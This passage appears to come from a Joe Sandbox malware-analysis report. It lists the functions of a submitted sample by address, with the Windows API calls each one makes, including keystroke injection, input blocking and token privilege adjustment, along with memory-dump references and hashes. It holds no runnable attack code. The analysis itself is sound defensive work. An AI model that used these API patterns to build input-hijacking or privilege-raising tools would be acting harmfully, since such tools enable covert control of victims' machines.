                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      • GetParent.USER32(?), ref: 008D73A3
                                      • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?), ref: 008D742D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LongWindow$DialogNtdllParentProc_
                                      • String ID:
                                      • API String ID: 314495775-0
                                      • Opcode ID: 20ab15867a119e9d856ab9818ac670c3fd2046ced03465ca83911cb7075ae725
                                      • Instruction ID: 9cd80f1c08279dda4acd23215838eb0d38d9f6f1c965b9848bd2093f4f84d428
                                      • Opcode Fuzzy Hash: 20ab15867a119e9d856ab9818ac670c3fd2046ced03465ca83911cb7075ae725
                                      • Instruction Fuzzy Hash: 7921A270604104AFCF25AF2DCC59AA93B96FF0A3B4F08436AF9659B3A1D3319D51E740
                                      Function 008F68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008F6918
                                      • FindClose.KERNEL32(00000000), ref: 008F6961
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 1f7b5ab1c94a59c0549ef490ad328466b2d48a9a29199533e5927650a6477e65
                                      • Instruction ID: 08176e3aeac320c28ae5700d1734252601c28fe4277d4e21a2804d5ad28d1d00
                                      • Opcode Fuzzy Hash: 1f7b5ab1c94a59c0549ef490ad328466b2d48a9a29199533e5927650a6477e65
                                      • Instruction Fuzzy Hash: E811D0716142049FD710DF29D484A26BBE0FF84328F14C699E569CF2A2DB70EC05CB91
                                      Function 009190A1 Relevance: 3.0, APIs: 2, Instructions: 44nativewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,008D769C,?,?,?), ref: 00919111
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 009190F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LongWindow$DialogMessageNtdllProc_Send
                                      • String ID:
                                      • API String ID: 1273190321-0
                                      • Opcode ID: 0b95fac5eb0a57ea08af9c752fb6e084b87475a3fcbefcbb421b40fa2ef96db6
                                      • Instruction ID: 2b6dbdeaecb11ac2ca5ecd1588c038069ce4d04013c10ef1b144811883a5d9e2
                                      • Opcode Fuzzy Hash: 0b95fac5eb0a57ea08af9c752fb6e084b87475a3fcbefcbb421b40fa2ef96db6
                                      • Instruction Fuzzy Hash: 9401B130208218BBDB219F28DC69FE63BA6FB85365F140428F9520A2E1C7326C81DB51
                                      Function 008F37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00904891,?,?,00000035,?), ref: 008F37E4
                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00904891,?,?,00000035,?), ref: 008F37F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 1b62182c6636a1bb8b3399f7a122bbc185a309bdd107c7bed99e2233a530b581
                                      • Instruction ID: 3e52171aadedbe7ff31ea2f9815e941a66e6157a6e239e9c68c4cd21adac96c4
                                      • Opcode Fuzzy Hash: 1b62182c6636a1bb8b3399f7a122bbc185a309bdd107c7bed99e2233a530b581
                                      • Instruction Fuzzy Hash: D3F0ECB07042192AD71027755C4DFEB36AEFFC5761F000175F505D2281D9709944C7B1
                                      Function 00919400 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 00919423
                                      • NtdllDialogWndProc_W.NTDLL(?,00000200,?,00000000,?,?,00000000,00000000,?,008D776C,?,?,?,?,?), ref: 0091944C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ClientDialogNtdllProc_Screen
                                      • String ID:
                                      • API String ID: 3420055661-0
                                      • Opcode ID: b8dcf6fb8404f14d76dea7898da9ce139af0288bbdd9c884f726276784a83779
                                      • Instruction ID: c7f9e076288ea0368506507edd49f8d38862cbd8fd97d823e3d886af0772b22d
                                      • Opcode Fuzzy Hash: b8dcf6fb8404f14d76dea7898da9ce139af0288bbdd9c884f726276784a83779
                                      • Instruction Fuzzy Hash: 02F03AB2514228FFEF048F51DC09EEE7FB9EB44352F00405AF905A2160D375AA50EBA0
                                      Function 008EB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 008EB25D
                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 008EB270
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: InputSendkeybd_event
                                      • String ID:
                                      • API String ID: 3536248340-0
                                      • Opcode ID: ee7dd6bf1d6b6ba94a72473cc98a9dc494f0d887aeaeb1cd915c3b0d3a525ad3
                                      • Instruction ID: 569c15071ecd1d9347f130281b0facfc032733cd5f6ddf3cfda38d472d88dc6f
                                      • Opcode Fuzzy Hash: ee7dd6bf1d6b6ba94a72473cc98a9dc494f0d887aeaeb1cd915c3b0d3a525ad3
                                      • Instruction Fuzzy Hash: F0F01D7195428DABDB059FA1C805BEE7BB4FF05309F008009F965A6191C3799611DF94
                                      Function 008E10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008E11FC), ref: 008E10D4
                                      • CloseHandle.KERNEL32(?,?,008E11FC), ref: 008E10E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: e9b614f681aa0031153f9868014ca2948d062cbccca0f5fa8a1b42a02ef411a2
                                      • Instruction ID: 176654d3e38cd87add79cb42f04e44adf7559913205126db5e37f16a0799ace8
                                      • Opcode Fuzzy Hash: e9b614f681aa0031153f9868014ca2948d062cbccca0f5fa8a1b42a02ef411a2
                                      • Instruction Fuzzy Hash: A2E0BF72158610AFEB292B55FC09EB777A9FB05310B24C82DF5A5C44B1DB626C90EB50
                                      Function 0091953A Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00919542
                                      • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,008D76FB,?,?,?,?), ref: 0091956C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 6f9bf06c8a49402e552397edaa7e1a0abff9ae7696adf673d2b8ed900c6d0e7f
                                      • Instruction ID: c15b25a799b6c22081c35552925fdce6fa587d32581ddc2476edc69b38fefd21
                                      • Opcode Fuzzy Hash: 6f9bf06c8a49402e552397edaa7e1a0abff9ae7696adf673d2b8ed900c6d0e7f
                                      • Instruction Fuzzy Hash: BCE08CB0248218BBFB190F19DC1AFF93B19EB00BA1F508515FD57A80E1D7B199D0E260
                                      Function 0088CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                      Download Yara Rule
                                      Strings
                                      • Variable is not of type 'Object'., xrefs: 008D0C40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Variable is not of type 'Object'.
                                      • API String ID: 0-1840281001
                                      • Opcode ID: 7ee8689e5cb0822656fb890b28e6a22e401a191878dde8bf415f8b5e64aa1c2f
                                      • Instruction ID: df42a9fdfd91e18184f47fafb062832774c0b6fab6c4ecdf20cb791fa0764b5d
                                      • Opcode Fuzzy Hash: 7ee8689e5cb0822656fb890b28e6a22e401a191878dde8bf415f8b5e64aa1c2f
                                      • Instruction Fuzzy Hash: A3329870900218DBDF14EF94D980BEDB7B5FF05308F24816AE806EB286DB75AE45CB61
                                      Function 008B676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008B6766,?,?,00000008,?,?,008BFEFE,00000000), ref: 008B6998
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 6f9f692a591161575231d6b4686b013a9685251cbfe8dc9ba5e393555173a5b9
                                      • Instruction ID: bba63be7f02e12d711eb785fab31920bef63e0d98fb95b8969edf07c0f693e64
                                      • Opcode Fuzzy Hash: 6f9f692a591161575231d6b4686b013a9685251cbfe8dc9ba5e393555173a5b9
                                      • Instruction Fuzzy Hash: 57B16E31610609DFDB15CF28C486BA57BE0FF05364F298658E899CF3A2D739E9A1CB40
                                      Function 0089B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 174ac041882e20815f27587a9a3b7bd805a681b4773ffdd73019ff9f5ce14abc
                                      • Instruction ID: 1e9c95263d394f490fdd16ae68b527e7c296a8f11264d94a6170fb03d07ffab9
                                      • Opcode Fuzzy Hash: 174ac041882e20815f27587a9a3b7bd805a681b4773ffdd73019ff9f5ce14abc
                                      • Instruction Fuzzy Hash: BE125C71A00229DBCF24DF58D9816EEB7B5FF48710F1481AAE849EB351DB309A81DF94
                                      Function 0091A2D7 Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 0091A38F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 034b0f830b11188446d855dc796734d4ba7b2b97c16927a42ed6f5dba5529964
                                      • Instruction ID: 90c531c13232f33785d677f606bc82cf203187bfa7907a745f4f01da7dad85d5
                                      • Opcode Fuzzy Hash: 034b0f830b11188446d855dc796734d4ba7b2b97c16927a42ed6f5dba5529964
                                      • Instruction Fuzzy Hash: D01103303093196AFB296B2CCC15BFD3658DB81760F248224FA614A1E1C7644DC2E296
                                      Function 009187B2 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 009187F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$CallLongProc
                                      • String ID:
                                      • API String ID: 4084987330-0
                                      • Opcode ID: 5df64cb507bc2c2f78a498bdac1241650a84bb5e17e3b578b581f37c7d029ef1
                                      • Instruction ID: 3c8befef23adbdf633a7cb817976a53954c185c4c65088400da910f0a810ba0c
                                      • Opcode Fuzzy Hash: 5df64cb507bc2c2f78a498bdac1241650a84bb5e17e3b578b581f37c7d029ef1
                                      • Instruction Fuzzy Hash: 2AF0FF3120810CEFCF15AF55EC54DFA3BAAEB09360B548554F9655A5A1CB32ACA0FB50
                                      Function 00918AAA Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                        • Part of subcall function 0089912D: GetCursorPos.USER32(?), ref: 00899141
                                        • Part of subcall function 0089912D: ScreenToClient.USER32(00000000,?), ref: 0089915E
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000001), ref: 00899183
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000002), ref: 0089919D
                                      • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,008D7818,?,?,?,?,?,00000001,?), ref: 00918AF8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                      • String ID:
                                      • API String ID: 2356834413-0
                                      • Opcode ID: 3f9ab94aaf8cb221f262e3f75db0e251a206680bd4ae643c17d0e1b3fcd75c14
                                      • Instruction ID: 66a934d08b8ff8c2e8c3ef73b9b3c1ee9095e01c05c816bd468592d5c4882afd
                                      • Opcode Fuzzy Hash: 3f9ab94aaf8cb221f262e3f75db0e251a206680bd4ae643c17d0e1b3fcd75c14
                                      • Instruction Fuzzy Hash: E3F08270240229ABEF146F19D81AAFE3F65FB007A1F004015F9161A191DBB699E0EBE5
                                      Function 00899052 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 00899096
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 2526c21e7395a20d999dc8efef88792edf84b464d1bf3177b7fa9e32439347dd
                                      • Instruction ID: 7011d29b6bb2353ff4bca7de454455bf008deaa7df645cb10b6d4023864a857d
                                      • Opcode Fuzzy Hash: 2526c21e7395a20d999dc8efef88792edf84b464d1bf3177b7fa9e32439347dd
                                      • Instruction Fuzzy Hash: 96F082306043189FDF28DF1AD865B763BA2FB41361F24811CF9624B2E0C73399A1EB60
                                      Function 008FEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 008FEABD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
